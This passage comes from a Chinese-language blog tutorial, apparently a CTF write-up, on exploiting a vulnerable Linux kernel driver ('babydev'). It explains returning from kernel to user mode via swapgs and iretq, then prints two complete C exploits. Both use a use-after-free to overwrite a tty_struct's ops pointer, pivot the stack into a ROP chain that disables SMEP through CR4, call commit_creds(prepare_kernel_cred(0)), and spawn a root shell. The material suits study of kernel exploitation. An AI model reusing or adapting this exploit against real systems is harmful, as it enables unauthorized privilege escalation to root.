  RESTORE_C_REGS
  REMOVE_PT_GPREGS_FROM_STACK 8
  INTERRUPT_RETURN

根据上面的分析信息，我们不难推断出，若想从内核态返回至用户态，则需要依次完成以下两件事情：

再执行一次 swapgs 指令，将当前的 GS 寄存器从 kernel gs 换回 user gs
手动在栈上构造 iret 指令所需要的5个寄存器值，然后调用 iret 指令。

因此最终实现的部分代码如下：

void get_shell() {
    printf("[+] got shell, welcome %s\n", (getuid() ? "user" : "root"));
    system("/bin/sh");
}

unsigned long user_cs, user_eflags, user_rsp, user_ss;

void save_iret_data() {
    __asm__ __volatile__ ("mov %%cs, %0" : "=r" (user_cs));
    __asm__ __volatile__ ("pushf");
    __asm__ __volatile__ ("pop %0" : "=r" (user_eflags));
    __asm__ __volatile__ ("mov %%rsp, %0" : "=r" (user_rsp));
    __asm__ __volatile__ ("mov %%ss, %0" : "=r" (user_ss));
}

int main() {
    save_iret_data();
    printf(
        "[+] iret data saved.\n"
        "    user_cs: %ld\n"
        "    user_eflags: %ld\n"
        "    user_rsp: %p\n"
        "    user_ss: %ld\n",
        user_cs, user_eflags, (char*)user_rsp, user_ss
    );
    [...]
    u_int64_t* hijacked_stack_ptr = (u_int64_t*)hijacked_stack_addr;
    int idx = 0;
    hijacked_stack_ptr[idx++] = pop_rdi_addr;              // pop rdi; ret
    hijacked_stack_ptr[idx++] = 0x6f0;
    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  // mov cr4, rdi; pop rbp; ret;
    hijacked_stack_ptr[idx++] = 0;                         // dummy
    hijacked_stack_ptr[idx++] = (u_int64_t)set_root_cred;
    // 新添加的 ROP 链
    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;
    hijacked_stack_ptr[idx++] = 0;                          // dummy
    hijacked_stack_ptr[idx++] = iretq_addr;
    hijacked_stack_ptr[idx++] = (u_int64_t)get_shell;       // iret_data.rip
    hijacked_stack_ptr[idx++] = user_cs;
    hijacked_stack_ptr[idx++] = user_eflags;
    hijacked_stack_ptr[idx++] = user_rsp;
    hijacked_stack_ptr[idx++] = user_ss;
    [...]
}

4.4) ROP 注意点

在往常的用户层面的利用，我们无需关注缺页错误这样的一个无关紧要的异常。然而在内核利用中，缺页错误往往非常致命（不管是否是可恢复的，即正常的缺页错误也很致命），大概率会直接引发 double fault，致使内核重启：

因此在构造 ROP 链时，应尽量避免在内核中直接引用那些尚未装载页面的内存页。

再一个问题是单步调试。在调试内核 ROP 链时，有概率会在单步执行时直接跑炸内核，但先给该位置下断点后，再跑至该位置则执行正常。这个调试…仁者见仁智者见智吧（滑稽）

4.5) 完整 exploit

完整的 exploit 如下所示：

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define xchg_eax_esp_addr           0xffffffff8100008a
#define prepare_kernel_cred_addr    0xffffffff810a1810
#define commit_creds_addr           0xffffffff810a1420
#define pop_rdi_addr                0xffffffff810d238d
#define mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80
#define swapgs_pop_rbp_addr         0xffffffff81063694          
#define iretq_addr                  0xffffffff814e35ef

void set_root_cred(){
    void* (*prepare_kernel_cred)(void*) = (void* (*)(void*))prepare_kernel_cred_addr;
    void (*commit_creds)(void*) = (void (*)(void*))commit_creds_addr;

    void * root_cred = prepare_kernel_cred(NULL);
    commit_creds(root_cred);
}

void get_shell() {
    printf("[+] got shell, welcome %s\n", (getuid() ? "user" : "root"));
    system("/bin/sh");
}

unsigned long user_cs, user_eflags, user_rsp, user_ss;

void save_iret_data() {
    __asm__ __volatile__ ("mov %%cs, %0" : "=r" (user_cs));
    __asm__ __volatile__ ("pushf");
    __asm__ __volatile__ ("pop %0" : "=r" (user_eflags));
    __asm__ __volatile__ ("mov %%rsp, %0" : "=r" (user_rsp));
    __asm__ __volatile__ ("mov %%ss, %0" : "=r" (user_ss));
}

int main() {
    save_iret_data();
    printf(
        "[+] iret data saved.\n"
        "    user_cs: %ld\n"
        "    user_eflags: %ld\n"
        "    user_rsp: %p\n"
        "    user_ss: %ld\n",
        user_cs, user_eflags, (char*)user_rsp, user_ss
    );

    int fd1 = open("/dev/babydev", O_RDWR);
    int fd2 = open("/dev/babydev", O_RDWR);
    ioctl(fd1, 65537, 0x2e0);

    close(fd1);

    // 申请 tty_struct
    int master_fd = open("/dev/ptmx", O_RDWR);

    // 构造一个 fake tty_operators
    u_int64_t fake_tty_ops[] = {
        0, 0, 0, 0, 0, 0, 0,
        xchg_eax_esp_addr, // int  (*write)(struct tty_struct*, const unsigned char *, int)
    };
    printf("[+] fake_tty_ops constructed\n");

    u_int64_t hijacked_stack_addr = ((u_int64_t)fake_tty_ops & 0xffffffff);
    printf("[+] hijacked_stack addr: %p\n", (char*)hijacked_stack_addr);

    char* fake_stack = NULL;
    if ((fake_stack = mmap(
            (char*)((hijacked_stack_addr & (~0xffff))),  // addr, 页对齐
            0x10000,                                     // length
            PROT_READ | PROT_WRITE,                     // prot
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,    // flags
            -1,                                         // fd
            0)                                          // offset
        ) == MAP_FAILED)  
        perror("mmap");
    
    printf("[+]     fake_stack addr: %p\n", fake_stack);

    u_int64_t* hijacked_stack_ptr = (u_int64_t*)hijacked_stack_addr;
    int idx = 0;
    hijacked_stack_ptr[idx++] = pop_rdi_addr;              // pop rdi; ret
    hijacked_stack_ptr[idx++] = 0x6f0;
    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  // mov cr4, rdi; pop rbp; ret;
    hijacked_stack_ptr[idx++] = 0;                         // dummy
    hijacked_stack_ptr[idx++] = (u_int64_t)set_root_cred;
    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;
    hijacked_stack_ptr[idx++] = 0;                          // dummy
    hijacked_stack_ptr[idx++] = iretq_addr;
    hijacked_stack_ptr[idx++] = (u_int64_t)get_shell;       // iret_data.rip
    hijacked_stack_ptr[idx++] = user_cs;
    hijacked_stack_ptr[idx++] = user_eflags;
    hijacked_stack_ptr[idx++] = user_rsp;
    hijacked_stack_ptr[idx++] = user_ss;

    printf("[+] privilege escape ROP prepared\n");

    // 读取 tty_struct 结构体的所有数据
    int ops_ptr_offset = 4 + 4 + 8 + 8;
    char overwrite_mem[ops_ptr_offset + 8];
    char** ops_ptr_addr = (char**)(overwrite_mem + ops_ptr_offset);

    read(fd2, overwrite_mem, sizeof(overwrite_mem));
    printf("[+] origin ops ptr addr: %p\n", *ops_ptr_addr);

    // 修改并覆写 tty_struct 结构体
    *ops_ptr_addr = (char*)fake_tty_ops;
    write(fd2, overwrite_mem, sizeof(overwrite_mem));
    printf("[+] hacked ops ptr addr: %p\n", *ops_ptr_addr);
    
    // 触发 tty_write
    // 注意使用 write 时， buf 指针必须有效，否则会提前返回 EFAULT
    int buf[] = {0};
    write(master_fd, buf, 8);

    return 0;
}

运行效果：

下面是一个简化版的 exploit:

#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define xchg_eax_esp_addr           0xffffffff8100008a
#define prepare_kernel_cred_addr    0xffffffff810a1810
#define commit_creds_addr           0xffffffff810a1420
#define pop_rdi_addr                0xffffffff810d238d
#define mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80
#define swapgs_pop_rbp_addr         0xffffffff81063694          
#define iretq_addr                  0xffffffff814e35ef

void set_root_cred(){
    void* (*prepare_kernel_cred)(void*) = prepare_kernel_cred_addr;
    void (*commit_creds)(void*) = commit_creds_addr;
    commit_creds(prepare_kernel_cred(NULL));
}

void get_shell() {
    system("/bin/sh");
}

unsigned long user_cs, user_eflags, user_rsp, user_ss;

void save_iret_data() {
    __asm__ __volatile__ ("mov %%cs, %0" : "=r" (user_cs));
    __asm__ __volatile__ ("pushf");
    __asm__ __volatile__ ("pop %0" : "=r" (user_eflags));
    __asm__ __volatile__ ("mov %%rsp, %0" : "=r" (user_rsp));
    __asm__ __volatile__ ("mov %%ss, %0" : "=r" (user_ss));
}

int main() {
    save_iret_data();

    int fd1 = open("/dev/babydev", O_RDWR);
    int fd2 = open("/dev/babydev", O_RDWR);
    ioctl(fd1, 65537, 0x2e0);
    close(fd1);

    int master_fd = open("/dev/ptmx", O_RDWR);

    u_int64_t fake_tty_ops[] = {
        0, 0, 0, 0, 0, 0, 0,
        xchg_eax_esp_addr
    };

    u_int64_t hijacked_stack_addr = ((u_int64_t)fake_tty_ops & 0xffffffff);

    char* fake_stack = mmap(
            (hijacked_stack_addr & (~0xffff)),
            0x10000,
            PROT_READ | PROT_WRITE,                    
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            -1,
            0);
    
    u_int64_t rop_chain_mem[] = {
        pop_rdi_addr, 0x6f0, 
        mov_cr4_rdi_pop_rbp_addr, 0, set_root_cred,
        swapgs_pop_rbp_addr, 0, 
        iretq_addr, get_shell, user_cs, user_eflags, user_rsp, user_ss
    };
    memcpy(hijacked_stack_addr, rop_chain_mem, sizeof(rop_chain_mem));
    
    int ops_ptr_offset = 4 + 4 + 8 + 8;
    char overwrite_mem[ops_ptr_offset + 8];
    char** ops_ptr_addr = overwrite_mem + ops_ptr_offset;

    read(fd2, overwrite_mem, sizeof(overwrite_mem));
    *ops_ptr_addr = fake_tty_ops;
    write(fd2, overwrite_mem, sizeof(overwrite_mem));

    int buf[] = {0};
    write(master_fd, buf, 8);

    return 0;
}

五、参考

版权声明： 本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！